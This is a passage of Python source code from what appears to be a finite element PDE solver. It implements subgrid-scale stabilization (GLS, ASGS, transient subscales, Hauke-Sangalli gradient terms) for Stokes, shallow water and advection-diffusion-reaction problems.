if nd == 2:
coefficients.stencil[1].add(2)
coefficients.stencil[2].add(1)
elif nd == 3:
coefficients.stencil[1].add(2)
coefficients.stencil[1].add(3)
coefficients.stencil[2].add(1)
coefficients.stencil[2].add(3)
coefficients.stencil[3].add(1)
            coefficients.stencil[3].add(2)
def calculateSubgridError(self,q):
if self.nd == 2:
# import pdb
# pdb.set_trace()
if self.coefficients.sd:
csubgridError.calculateSubgridErrorStokes_GLS_tau_sd(self.mesh.elementDiametersArray,
q[('dH',1,0)],
q[('a',1,1)],
self.tau[0],
self.tau[1])
else:
csubgridError.calculateSubgridErrorStokes_GLS_tau(self.mesh.elementDiametersArray,
q[('dH',1,0)],
q[('a',1,1)],
self.tau[0],
self.tau[1])
csubgridError.calculateSubgridErrorStokes2D_GLS_tauRes(self.tau[0],
self.tau[1],
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,2)],
q[('subgridError',0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,2)])
elif self.nd == 3:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorStokes_GLS_tau_sd(self.mesh.elementDiametersArray,
q[('dH',1,0)],
q[('a',1,1)],
self.tau[0],
self.tau[1])
else:
csubgridError.calculateSubgridErrorStokes_GLS_tau(self.mesh.elementDiametersArray,
q[('dH',1,0)],
q[('a',1,1)],
self.tau[0],
self.tau[1])
self.tau[0][:] = 0.0
csubgridError.calculateSubgridErrorStokes3D_GLS_tauRes(self.tau[0],
self.tau[1],
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('dpdeResidual',0,3)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,2)],
q[('pdeResidual',3)],
q[('dpdeResidual',3,0)],
q[('dpdeResidual',3,3)],
q[('subgridError',0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('dsubgridError',0,3)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,2)],
q[('subgridError',3)],
q[('dsubgridError',3,0)],
q[('dsubgridError',3,3)])
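#Illustrative sketch only (not called by the solver): what the
#csubgridError.calculateSubgridError_tauRes-style routines used above are assumed to
#compute, based on the sign convention noted later in this file ("we are storing
#subgridError = tau*Res so need to reverse sign"): the subgridError array holds
#tau*R_h and the actual subscale is delta u = -tau*R_h.  The function and argument
#names are hypothetical stand-ins for the quadrature arrays; numpy arrays assumed.
def _sketch_subgridError_tauRes(tau,pdeResidual,dpdeResidual,subgridError,dsubgridError):
    subgridError[:] = tau
    subgridError *= pdeResidual   #stores tau*R_h; callers treat the subscale as -tau*R_h
    dsubgridError[:] = tau
    dsubgridError *= dpdeResidual #assumed linearization of tau*R_h w.r.t. component cj dofs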
class TwophaseStokes_LS_FC_ASGS(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
self.nc = coefficients.nc
self.nd = nd
self.components=range(self.nc)
self.lag=lag
self.stabilizationFlag = stabFlag
coefficients.stencil[0].add(0)
def initializeElementQuadrature(self,mesh,t,cq):
self.mesh=mesh
self.tau=[]
self.tau_last=[]
if self.lag:
self.tau_last = numpy.zeros(cq[('u',0)].shape,'d')
self.tau = numpy.zeros(cq[('u',0)].shape,'d')
else:
self.tau = numpy.zeros(cq[('u',0)].shape,'d')
def calculateSubgridError(self,q):
csubgridError.calculateSubgridError_A_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',0,0)],
q[('df',0,0)],
q[('cfl',0)],
self.tau)
if self.lag:
tau = self.tau_last
else:
tau = self.tau
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',0)],
q[('dpdeResidual',0,0)],
q[('subgridError',0)],
q[('dsubgridError',0,0)])
csubgridError.calculateSubgridErrorStokes2D_GLS_velocity(self.mesh.elementDiametersArray,
q[('a',2,2)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,1)],
q[('dpdeResidual',2,2)],
q[('pdeResidual',3)],
q[('dpdeResidual',3,1)],
q[('dpdeResidual',3,3)],
q[('subgridError',2)],
q[('dsubgridError',2,1)],
q[('dsubgridError',2,2)],
q[('subgridError',3)],
q[('dsubgridError',3,1)],
q[('dsubgridError',3,3)])
def updateSubgridErrorHistory(self,initializationPhase=False):
        if self.lag:
self.tau_last[:] = self.tau
class ShallowWater_CFL(SGE_base):
def __init__(self,coefficients,nd,g):
SGE_base.__init__(self,coefficients,nd,lag=False)
self.g=g
self.nc=nd+1
self.nd=nd
def calculateSubgridError(self,q):
if self.nd==1:
csubgridError.calculateSubgridErrorShallowWater1D(self.g,
self.mesh.elementDiametersArray,
q[('u',0)],
q[('u',1)],
q[('cfl',0)],
q[('cfl',1)])
if self.nd==2:
csubgridError.calculateSubgridErrorShallowWater2D(self.g,
self.mesh.elementDiametersArray,
q[('u',0)],
q[('u',1)],
q[('u',2)],
q[('cfl',0)],
q[('cfl',1)],
q[('cfl',2)])
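#Illustrative sketch only: a plausible 1D version of the shallow water CFL computed by
#the csubgridError routine above, using the gravity-wave celerity sqrt(g*h).  The exact
#formula inside csubgridError.calculateSubgridErrorShallowWater1D is not visible here,
#so this is an assumption; argument names are hypothetical (h = q[('u',0)],
#hu = q[('u',1)]) and numpy is assumed imported at module level as elsewhere in this file.
def _sketch_shallowWaterCFL_1d(g,elementDiametersArray,h,hu,cfl,eps=1.0e-8):
    hSafe = numpy.maximum(h,eps)                  #guard against dry states
    u = hu/hSafe                                  #velocity recovered from the momentum variable
    c = numpy.sqrt(g*hSafe)                       #gravity wave celerity
    cfl[:] = numpy.absolute(u) + c                #fastest characteristic speed |u|+c
    cfl /= elementDiametersArray[:,numpy.newaxis] #scale by the element diameter h_e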
class SkewStabilization_1:
def __init__(self,mesh,nc,nd):
self.mesh = mesh
self.nc = nc
self.nd = nd
def calculateSubgridError(self,q):
nc = self.nc
for ci in range(self.nc):
vfemIntegrals.calculateSubgridErrorScalarADR_1(self.mesh.elementDiametersArray,
q[('df',ci,nc-1-ci)],
q[('a',ci,nc-1-ci)],
q[('da',ci,nc-1-ci,nc-1-ci)],
q[('grad(phi)',nc-1-ci)],
q[('dphi',nc-1-ci,nc-1-ci)],
q[('dr',ci,nc-1-ci)],
q[('dmt',ci,nc-1-ci)],
q[('pe',ci)],
q[('cfl',ci)],
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,nc-1-ci)],
q[('subgridError',ci)],
q[('dsubgridError',ci,nc-1-ci)])
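#Note on SkewStabilization_1 above: it is "skew" in the sense that component ci is
#stabilized using the coefficients and residual couplings of component nc-1-ci, so for
#nc=2 component 0 uses component 1's coefficients and vice versa.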
class AdvectionDiffusionReactionTransientSubscales_ASGS(AdvectionDiffusionReaction_ASGS):
"""
track subgrid scales in time with Backward Euler
\delta u^{n+1} = -\tau_t\tilde{R}_h
\tilde{R}_h = R_h - m^{\prime,k}\frac{\delta u^{n}}{\Delta t^{n+1}}
\tau_t = \frac{\Delta t^{n+1}\tau_s}{m^{prime,n+1}\tau_s + \Delta t^{n+1}}
\tau_s = normal spatial tau, supposed to have \tau_s \approx \mathcal{L}^{-1}_{s}
for now m^{prime} evaluated at k=n for subgrid error but not sure if this is right or not
TODO:
Check Peclet number calculation in generic tau and cfl calculation, what's returned in cfl array
(advective or max of advective,diffusive stab. constraint)
FLCBDF seems less happy with tracking subgrid scales than without tracking
"""
def __init__(self,coefficients,nd,stabFlag='1',lag=False,trackSubScales=False,useHarariDirectly=False,
limit_tau_t=False,tau_t_limit_min=0.0,tau_t_limit_max=1.0):
AdvectionDiffusionReaction_ASGS.__init__(self,coefficients,nd,stabFlag=stabFlag,lag=lag)
self.trackSubScales=trackSubScales
self.timeIntegration = None
self.useHarariDirectly = useHarariDirectly
#apply bounds to tau_t?
self.limit_tau_t = limit_tau_t
self.tau_t_limit_min = tau_t_limit_min
self.tau_t_limit_max = tau_t_limit_max
def initializeElementQuadrature(self,mesh,t,cq):
AdvectionDiffusionReaction_ASGS.initializeElementQuadrature(self,mesh,t,cq)
import copy
self.subgridError_last=[]
self.subgridErrorMassCoef_last = []
self.subgridTmp = []; self.subgridTmp2 = []
for ci in range(self.nc):
self.subgridTmp.append(numpy.zeros(cq[('u',ci)].shape,'d'))
if self.trackSubScales:
self.subgridError_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.subgridErrorMassCoef_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.subgridTmp2.append(numpy.zeros(cq[('u',ci)].shape,'d'))
else:
self.subgridError_last.append(None)
self.subgridErrorMassCoef_last.append(None)
def initializeTimeIntegration(self,timeIntegration):
"""
allow for connection with time integration method if tracking subscales
"""
self.timeIntegration = timeIntegration
def updateSubgridErrorHistory(self,initializationPhase=False):
AdvectionDiffusionReaction_ASGS.updateSubgridErrorHistory(self,initializationPhase=initializationPhase)
if self.trackSubScales:
for ci in range(self.nc):
if not initializationPhase:
#we are storing subgridError = tau*Res so need to reverse sign
self.subgridError_last[ci].flat[:] = self.cq[('subgridError',ci)].flat
self.subgridError_last[ci] *= -1.0
#mwf debug
logEvent("ADR_ASGS tracksubscales updateSubgridErrorHistory max subgridError = %s " % (self.subgridError_last[ci].max()),10)
#how are we going to define subgrid mass?
self.subgridErrorMassCoef_last[ci].flat[:] = self.cq[('dm',ci,ci)].flat
def calculateSubgridError(self,q):
for ci in range(self.nc):
#mwf need to calculate tau_s without dm/dt
mttmp = q[('dmt',ci,ci)]
if self.trackSubScales:
self.subgridTmp[ci].fill(0.0)
mttmp = self.subgridTmp[ci]
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_generic_tau_sd(self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
q['inverse(J)'],
mttmp,
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_generic_tau(q['inverse(J)'],
mttmp,
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
if self.lag:
tau=self.tau_last[ci]
#dm_subgrid = self.subgridErrorMassCoef_last[ci]
else:
tau=self.tau[ci]
#dm_subgrid = q[('dm',ci,ci)]
dm_subgrid = self.cq[('dm_sge',ci,ci)]
#mwf debug
#import pdb
#pdb.set_trace()
if self.trackSubScales:
#mwf debug
logEvent("ADR_ASGS trackScales before transient modficication (tau_s) tau[ci].max= %s tau[ci].min=%s " % (tau[ci].max(),tau[ci].min()),10)
#tau here should be the same as tau_t in Codina's formalism if dmdt is included?
#calculate \tilde{R}_h = R_h - \delta m^{n}/dt^{n+1}
self.subgridTmp[ci][:] = self.subgridError_last[ci]
dt = self.timeIntegration.dt
assert dt > 0.0
dtInv = 1.0/dt
self.subgridTmp[ci] *= dtInv
self.subgridTmp[ci] *= self.subgridErrorMassCoef_last[ci]#decide what time level to use
q[('pdeResidual',ci)] -= self.subgridTmp[ci] #R_h --> \tilde{R}_h
if tau.max() > 0.0:
#mwf debug
#import pdb
#pdb.set_trace()
self.subgridTmp[ci][:] = tau
self.subgridTmp[ci] *= dt
self.subgridTmp2[ci][:] = tau
self.subgridTmp2[ci] *= dm_subgrid
self.subgridTmp2[ci] += dt
self.subgridTmp[ci] /= self.subgridTmp2[ci]
if self.coefficients.sd and self.useHarariDirectly:
csubgridError.calculateSubgridError_Harari_tau_sd(self.nd,dt,
self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
self.mesh.elementDiametersArray,
q[('a',ci,ci)],
self.subgridTmp[ci])
#bound tau_t based on dt size
if self.limit_tau_t:
numpy.clip(self.subgridTmp[ci],self.tau_t_limit_min*dt,self.tau_t_limit_max*dt,self.subgridTmp[ci])
tau = self.subgridTmp[ci]
#mwf debug
logEvent("ADR_ASGS trackScales after modifying tau[ci].max= %s tau[ci].min= %s " % (tau[ci].max(),tau[ci].min()),10)
#mwf should be 1.0/m'
                assert tau.max() * dm_subgrid.max() /dt <= 1.0, "Subgrid scales, modified tau_t.max() = %s dt = %s dm_subgrid.max() = %s tau_t*m'/dt = %s must be less than 1 " % (tau.max(),
                                                                                                                                                                                   dt,
                                                                                                                                                                                   dm_subgrid.max(),
                                                                                                                                                                                   tau.max()*dm_subgrid.max()/dt)
#
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,cj)],
q[('subgridError',ci)],
q[('dsubgridError',ci,cj)])
#mwf debug
logEvent("ADR_ASGS pdeResidual[ci].max = %s subgridError.max = %s subgridError.min= %s " % (q[('pdeResidual',ci)].max(),
q[('subgridError',ci)].max(),
q[('subgridError',ci)].min()),10)
def accumulateSubgridMassHistory(self,q):
"""
incorporate subgrid scale mass accumulation
        \delta m^{n}/\Delta t^{n+1}
"""
if self.trackSubScales:
for ci in range(self.nc):
self.subgridTmp[ci][:] = self.subgridError_last[ci]
dt = self.timeIntegration.dt
assert dt > 0.0
dtInv = 1.0/dt
self.subgridTmp[ci] *= dtInv
self.subgridTmp[ci] *= self.subgridErrorMassCoef_last[ci]#decide how to approximate
logEvent("ADR trackSubScales accumulating delta u^n.abs.max= %s dm.max=%s " % (max(numpy.absolute(self.subgridTmp[ci].flat)),
max(numpy.absolute(self.subgridErrorMassCoef_last[ci].flat))),10)
q[('mt',ci)] -= self.subgridTmp[ci]
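#Illustrative sketch only: the transient subscale update described in the
#AdvectionDiffusionReactionTransientSubscales_ASGS docstring above, written out with
#plain numpy arrays.  Argument names are hypothetical; tau_s is the spatial tau, dm and
#dm_old are m' at the new and old time levels, R is the strong residual at quadrature
#points, and delta_u_old is the stored subscale \delta u^{n}.
def _sketch_transient_subscale_update(tau_s,dm,dm_old,R,delta_u_old,dt):
    assert dt > 0.0
    Rtilde = R - dm_old*delta_u_old/dt #\tilde{R}_h = R_h - m'\delta u^{n}/\Delta t^{n+1}
    tau_t = dt*tau_s/(dm*tau_s + dt)   #\tau_t = \Delta t^{n+1}\tau_s/(m'\tau_s + \Delta t^{n+1})
    return -tau_t*Rtilde               #\delta u^{n+1} = -\tau_t\tilde{R}_h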
class AdvectionDiffusionReactionHaukeSangalliInterpolant_ASGS(SGE_base):
"""
    Should be the basic Hauke-Sangalli approach, but computes terms at interpolation points
    and then uses these to compute the gradient for the Sangalli-type approach.
    The adjoint gradient is computed manually.
"""
def __init__(self,coefficients,nd,stabFlag='1',lag=False,interpolationFemSpaceType=None,tau_00_force=None,
tau_11_force=None):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
self.interpolationFemSpaceType = interpolationFemSpaceType
assert self.interpolationFemSpaceType != None
self.usesFEMinterpolant = True
self.usesGradientStabilization = True
self.tau_00_force=tau_00_force; self.tau_11_force = tau_11_force
def initializeElementQuadrature(self,mesh,t,cq,cip=None):
"""
"""
SGE_base.initializeElementQuadrature(self,mesh,t,cq)
import copy
self.cq=cq
self.cip=cip
assert self.cip != None
self.tau_gradient = []
self.tau_gradient_last = []
self.subgridTmp = [];
self.subgridTmp_ip = [];
self.grad_u_last = []
for ci in range(self.nc):
self.subgridTmp.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.subgridTmp_ip.append(numpy.zeros(cip[('u',ci)].shape,'d'))
self.grad_u_last.append(numpy.zeros(cq[('grad(u)',ci)].shape,'d'))
if self.lag:
if cip.has_key(('df',ci,ci)):
cip[('df_sge',ci,ci)] = copy.deepcopy(cip[('df',ci,ci)])
if cip.has_key(('dm',ci,ci)):
cip[('dm_sge',ci,ci)] = copy.deepcopy(cip[('dm',ci,ci)])
if cip.has_key(('dmt',ci,ci)):
cip[('dmt_sge',ci,ci)] = copy.deepcopy(cip[('dmt',ci,ci)])
#
if cq.has_key(('df',ci,ci)):
cq[('df_sge',ci,ci)] = copy.deepcopy(cq[('df',ci,ci)])
if cq.has_key(('dm',ci,ci)):
cq[('dm_sge',ci,ci)] = copy.deepcopy(cq[('dm',ci,ci)])
if cq.has_key(('dmt',ci,ci)):
cq[('dmt_sge',ci,ci)] = copy.deepcopy(cq[('dmt',ci,ci)])
else:
if cip.has_key(('df',ci,ci)):
cip[('df_sge',ci,ci)] = cip[('df',ci,ci)]
if cip.has_key(('dm',ci,ci)):
cip[('dm_sge',ci,ci)] = cip[('dm',ci,ci)]
if cip.has_key(('dmt',ci,ci)):
cip[('dmt_sge',ci,ci)] = cip[('dmt',ci,ci)]
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
#
if self.lag:#mwf looks like this was missing if lag May 7 09
cip[('grad(phi)_sge',ck)]=copy.deepcopy(cip[('grad(phi)',ck)])
for cj in cjDict.keys():
cip[('dphi_sge',ck,cj)]=copy.deepcopy(cip[('dphi',ck,cj)])
cip[('da_sge',ci,ck,cj)]=copy.deepcopy(cip[('da',ci,ck,cj)])
#
cq[('grad(phi)_sge',ck)]=copy.deepcopy(cq[('grad(phi)',ck)])
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=copy.deepcopy(cq[('dphi',ck,cj)])
cq[('da_sge',ci,ck,cj)]=copy.deepcopy(cq[('da',ci,ck,cj)])
else:
cip[('grad(phi)_sge',ck)]=cip[('grad(phi)',ck)]
for cj in cjDict.keys():
cip[('dphi_sge',ck,cj)]=cip[('dphi',ck,cj)]
cip[('da_sge',ci,ck,cj)]=cip[('da',ci,ck,cj)]
#
self.interpolationSpace = {}; self.strongResidualInterpolant = {};
if self.interpolationFemSpaceType != None:
for ci in range(self.nc):
self.interpolationSpace[ci] = self.interpolationFemSpaceType(self.mesh.subdomainMesh,self.nd)
self.strongResidualInterpolant[ci] = FemTools.FiniteElementFunction(self.interpolationSpace[ci])
if self.usesGradientStabilization == True:
for ci in range(self.nc):
cq[('grad(pdeResidual)',ci)]= numpy.zeros(cq[('grad(u)',ci)].shape,'d')
cq[('grad(subgridError)',ci)]= numpy.zeros(cq[('grad(u)',ci)].shape,'d')
#mwf hack just make a scalar to test Jacobian
for cj in range(self.nc):
cq[('dgrad(subgridError)',ci,cj)]= numpy.zeros(cq[('u',ci)].shape,'d')
self.tau_gradient.append(numpy.zeros(self.tau[ci].shape,'d'))
if self.lag:
self.tau_gradient_last.append(numpy.zeros(self.tau_last[ci].shape,'d'))
def initializeTimeIntegration(self,timeIntegration):
"""
allow for connection with time integration method if tracking subscales
"""
self.timeIntegration = timeIntegration
def calculateSubgridErrorInterpolants(self,ci):
"""
        should interpolate the strong residual. One problem is that the
        strong residual is discontinuous when grad(u) terms are nonzero,
        so a standard C0 projection won't necessarily be what we expect
        locally on each element. For C0 P1 elements and a linear problem
        with constant coefficients, computing the gradient locally should
        be just the same as ignoring the gradient terms altogether.
"""
#mwf debug
#import pdb
#pdb.set_trace()
#now project to finite element space
if self.usesGradientStabilization:
#mwf hack!
#self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.cip[('pdeResidual',ci)])
#self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.cip[('mt',ci)])
#self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.cip[('m',ci)]/self.timeIntegration.dt)
#self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.cip[('r',ci)])
self.subgridTmp_ip[ci].fill(0.0)
if self.cip.has_key(('mt',ci)):
self.subgridTmp_ip[ci] += self.cip[('mt',ci)]
if self.cip.has_key(('r',ci)):
self.subgridTmp_ip[ci] += self.cip[('r',ci)]
self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.subgridTmp_ip[ci])
def calculateSubgridError(self,q):
#compute basic ASGS stabilization as before
for ci in range(self.nc):
self.calculateSubgridErrorInterpolants(ci)
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_Sangalli_tau_sd(self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
q['inverse(J)'],
q[('dmt',ci,ci)],
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci],
self.tau_gradient[ci])
            else:
                assert False, "only sparse diffusion (sd) coefficient storage is handled here"
if self.lag:
tau=self.tau_last[ci]
tau_gradient=self.tau_gradient_last[ci]
#have to figure out way to update dmt_sge if lagging
else:
tau=self.tau[ci]
tau_gradient = self.tau_gradient[ci]
#mwf hack ...
if self.coefficients.sd and False:
logEvent("HaukeSangalli Hack switching from tau.max()= %s tau.min()= %s to " % (tau[ci].max(),tau[ci].min()),1)
csubgridError.calculateSubgridError_ADR_generic_tau_sd(self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
q['inverse(J)'],
q[('dmt',ci,ci)],
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
tau = self.tau[ci]
logEvent("Generic tau is tau.max() =%s tau.min() = %s to " % (tau[ci].max(),tau[ci].min()),1)
#mwf hack
if self.tau_00_force != None:
tau.fill(self.tau_00_force)
if self.tau_11_force != None:
tau_gradient.fill(self.tau_11_force)
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,cj)],
q[('subgridError',ci)],
q[('dsubgridError',ci,cj)])
for ci in range(self.nc):
#mwf debug
#import pdb
#pdb.set_trace()
#this is the general way but right now we're having a problem when we interpolate
#the actual residual because of the discontinuous gradient terms
self.strongResidualInterpolant[ci].getGradientValues(q[('grad(v)',ci)],
q[('grad(pdeResidual)',ci)])
#mwf hack to test calculation
q[('grad(pdeResidual)',ci)].flat[:] = q[('grad(u)',ci)].flat
q[('grad(pdeResidual)',ci)] -= self.grad_u_last[ci]
q[('grad(pdeResidual)',ci)] /= self.timeIntegration.dt
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridErrorGradient_tauRes(tau_gradient,
q[('grad(pdeResidual)',ci)],
q[('grad(subgridError)',ci)])
#have got to come up with way to handle jacobian
q[('dgrad(subgridError)',ci,cj)].flat[:] = q[('dmt',ci,cj)].flat
q[('dgrad(subgridError)',ci,cj)] += q[('dr',ci,cj)]
self.subgridTmp[ci].flat[:] = q[('dmt_sge',ci,cj)].flat
self.subgridTmp[ci] += q[('dr',ci,cj)]
q[('dgrad(subgridError)',ci,cj)] *= self.subgridTmp[ci]
q[('dgrad(subgridError)',ci,cj)] *= tau_gradient
q[('dgrad(subgridError)',ci,cj)] *= -1.0
#below works for just dmt approx for residual
# q[('dgrad(subgridError)',ci,cj)].flat[:] = tau_gradient.flat
# q[('dgrad(subgridError)',ci,cj)] *= -1.0
# q[('dgrad(subgridError)',ci,cj)] *= q[('dmt_sge',ci,cj)]
# q[('dgrad(subgridError)',ci,cj)] *= q[('dmt',ci,cj)]
logEvent("HaukeSangalli ADR tau_00.max() = %s tau_11.max() = %s grad(pdeResidual).max= %s grad(subgridError).max= %s dgrad(subgridError).max= %s " % (tau.max(),tau_gradient.max(),
q[('grad(pdeResidual)',ci)].max(),
q[('grad(subgridError)',ci)].max(),
q[('dgrad(subgridError)',ci,ci)].max()),1)
#mwf debug
#import pdb
#pdb.set_trace()
# print "tau",tau
# print "pdeResidual",q[('pdeResidual',ci)]
# print "dpdeResidual",q[('dpdeResidual',ci,ci)]
# print "subgrid error",q[('subgridError',ci)]
# print "dsubgrid error",q[('dsubgridError',ci,ci)]
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in range(self.nc):
self.tau_last[ci][:] = self.tau[ci]
self.tau_gradient_last[ci][:] = self.tau_gradient[ci]
self.cip[('df_sge',ci,ci)][:] = self.cip[('df',ci,ci)]
self.cip[('dm_sge',ci,ci)][:] = self.cip[('dm',ci,ci)]
#
self.cq[('df_sge',ci,ci)][:] = self.cq[('df',ci,ci)]
self.cq[('dm_sge',ci,ci)][:] = self.cq[('dm',ci,ci)]
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
self.cip[('grad(phi)_sge',ck)][:]=self.cip[('grad(phi)',ck)]
for cj in cjDict.keys():
self.cip[('dphi_sge',ck,cj)][:]=0.0 #grad(phi) will be a constant when lagged so dphi=0 not 1
self.cip[('da_sge',ci,ck,cj)][:]=self.cip[('da',ci,ck,cj)]
for ck,cjDict in ckDict.iteritems():
self.cq[('grad(phi)_sge',ck)][:]=self.cq[('grad(phi)',ck)]
for cj in cjDict.keys():
self.cq[('dphi_sge',ck,cj)][:]=0.0 #grad(phi) will be a constant when lagged so dphi=0 not 1
self.cq[('da_sge',ci,ck,cj)][:]=self.cq[('da',ci,ck,cj)]
#
#
#mwf hack to test
self.grad_u_last[ci].flat[:] = self.cq[('grad(u)',ci)].flat
#
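#Illustrative sketch only: the manual Jacobian assembly for the gradient stabilization
#in calculateSubgridError above, mirroring the in-place arithmetic on
#q[('dgrad(subgridError)',ci,cj)].  The sign and products are copied from that code;
#argument names are hypothetical numpy arrays.
def _sketch_dgrad_subgridError(tau_gradient,dmt,dr,dmt_sge):
    #dgrad(subgridError) = -tau_11*(dmt + dr)*(dmt_sge + dr)
    return -tau_gradient*(dmt + dr)*(dmt_sge + dr)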
class AdvectionDiffusionReactionHaukeSangalliInterpolantWithTransientSubScales_ASGS(AdvectionDiffusionReactionHaukeSangalliInterpolant_ASGS):
"""
    Should be the basic Hauke-Sangalli approach, but computes terms at interpolation points
    and then uses these to compute the gradient for the Sangalli-type approach.
    The adjoint gradient is computed manually,
    and the subscales are tracked in time.
"""
def __init__(self,coefficients,nd,stabFlag='1',lag=False,interpolationFemSpaceType=None,trackSubScales=False,tau_00_force=None,
tau_11_force=None,includeSubgridScalesInGradientStabilization=True):
        AdvectionDiffusionReactionHaukeSangalliInterpolant_ASGS.__init__(self,coefficients,nd,stabFlag=stabFlag,lag=lag,
                                                                         interpolationFemSpaceType=interpolationFemSpaceType,tau_00_force=tau_00_force,
                                                                         tau_11_force=tau_11_force)
self.trackSubScales = trackSubScales
self.includeSubgridScalesInGradientStabilization = includeSubgridScalesInGradientStabilization
def initializeElementQuadrature(self,mesh,t,cq,cip=None):
"""
"""
AdvectionDiffusionReactionHaukeSangalliInterpolant_ASGS.initializeElementQuadrature(self,mesh,t,cq,cip)
import copy
self.subgridError_last=[]
self.subgridErrorMassCoef_last = []
self.subgridTmp = []; self.subgridTmp2 = []
self.subgridError_ip_last=[]
self.subgridErrorMassCoef_ip_last = []
self.subgridTmp_ip = []; self.subgridTmp2_ip = []
self.tau_ip = [] ; self.tau_ip_last = []
self.tau_gradient_ip = [] ; self.tau_gradient_ip_last = []
for ci in range(self.nc):
self.subgridTmp.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.subgridTmp_ip.append(numpy.zeros(cip[('u',ci)].shape,'d'))
if self.trackSubScales:
self.subgridError_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.subgridErrorMassCoef_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.subgridTmp2.append(numpy.zeros(cq[('u',ci)].shape,'d'))
#
self.subgridError_ip_last.append(numpy.zeros(cip[('u',ci)].shape,'d'))
self.subgridErrorMassCoef_ip_last.append(numpy.zeros(cip[('u',ci)].shape,'d'))
self.subgridTmp2_ip.append(numpy.zeros(cip[('u',ci)].shape,'d'))
self.tau_ip.append(copy.deepcopy(self.tau[ci]))
self.tau_gradient_ip.append(copy.deepcopy(self.tau_gradient[ci]))
if self.lag:
self.tau_ip_last.append(copy.deepcopy(self.tau_last[ci]))
self.tau_gradient_ip_last.append(copy.deepcopy(self.tau_gradient_last[ci]))
else:
self.subgridError_last.append(None)
self.subgridErrorMassCoef_last.append(None)
self.subgridError_ip_last.append(None)
self.subgridErrorMassCoef_ip_last.append(None)
def calculateSubgridErrorInterpolants(self,ci):
#mwf debug
#import pdb
#pdb.set_trace()
#now project to finite element space
hack = False
if self.usesGradientStabilization:
if hack:#mwf hack!
#self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.cip[('pdeResidual',ci)])
#self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.cip[('mt',ci)])
#self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.cip[('m',ci)]/self.timeIntegration.dt)
self.subgridTmp_ip[ci].flat[:] = self.cip[('m',ci)]
self.subgridTmp_ip[ci] /= self.timeIntegration.dt
else:
self.subgridTmp_ip[ci].fill(0.0)
if self.cip.has_key(('mt',ci)):
self.subgridTmp_ip[ci] += self.cip[('mt',ci)]
if self.cip.has_key(('r',ci)):
self.subgridTmp_ip[ci] += self.cip[('r',ci)]
if self.includeSubgridScalesInGradientStabilization:
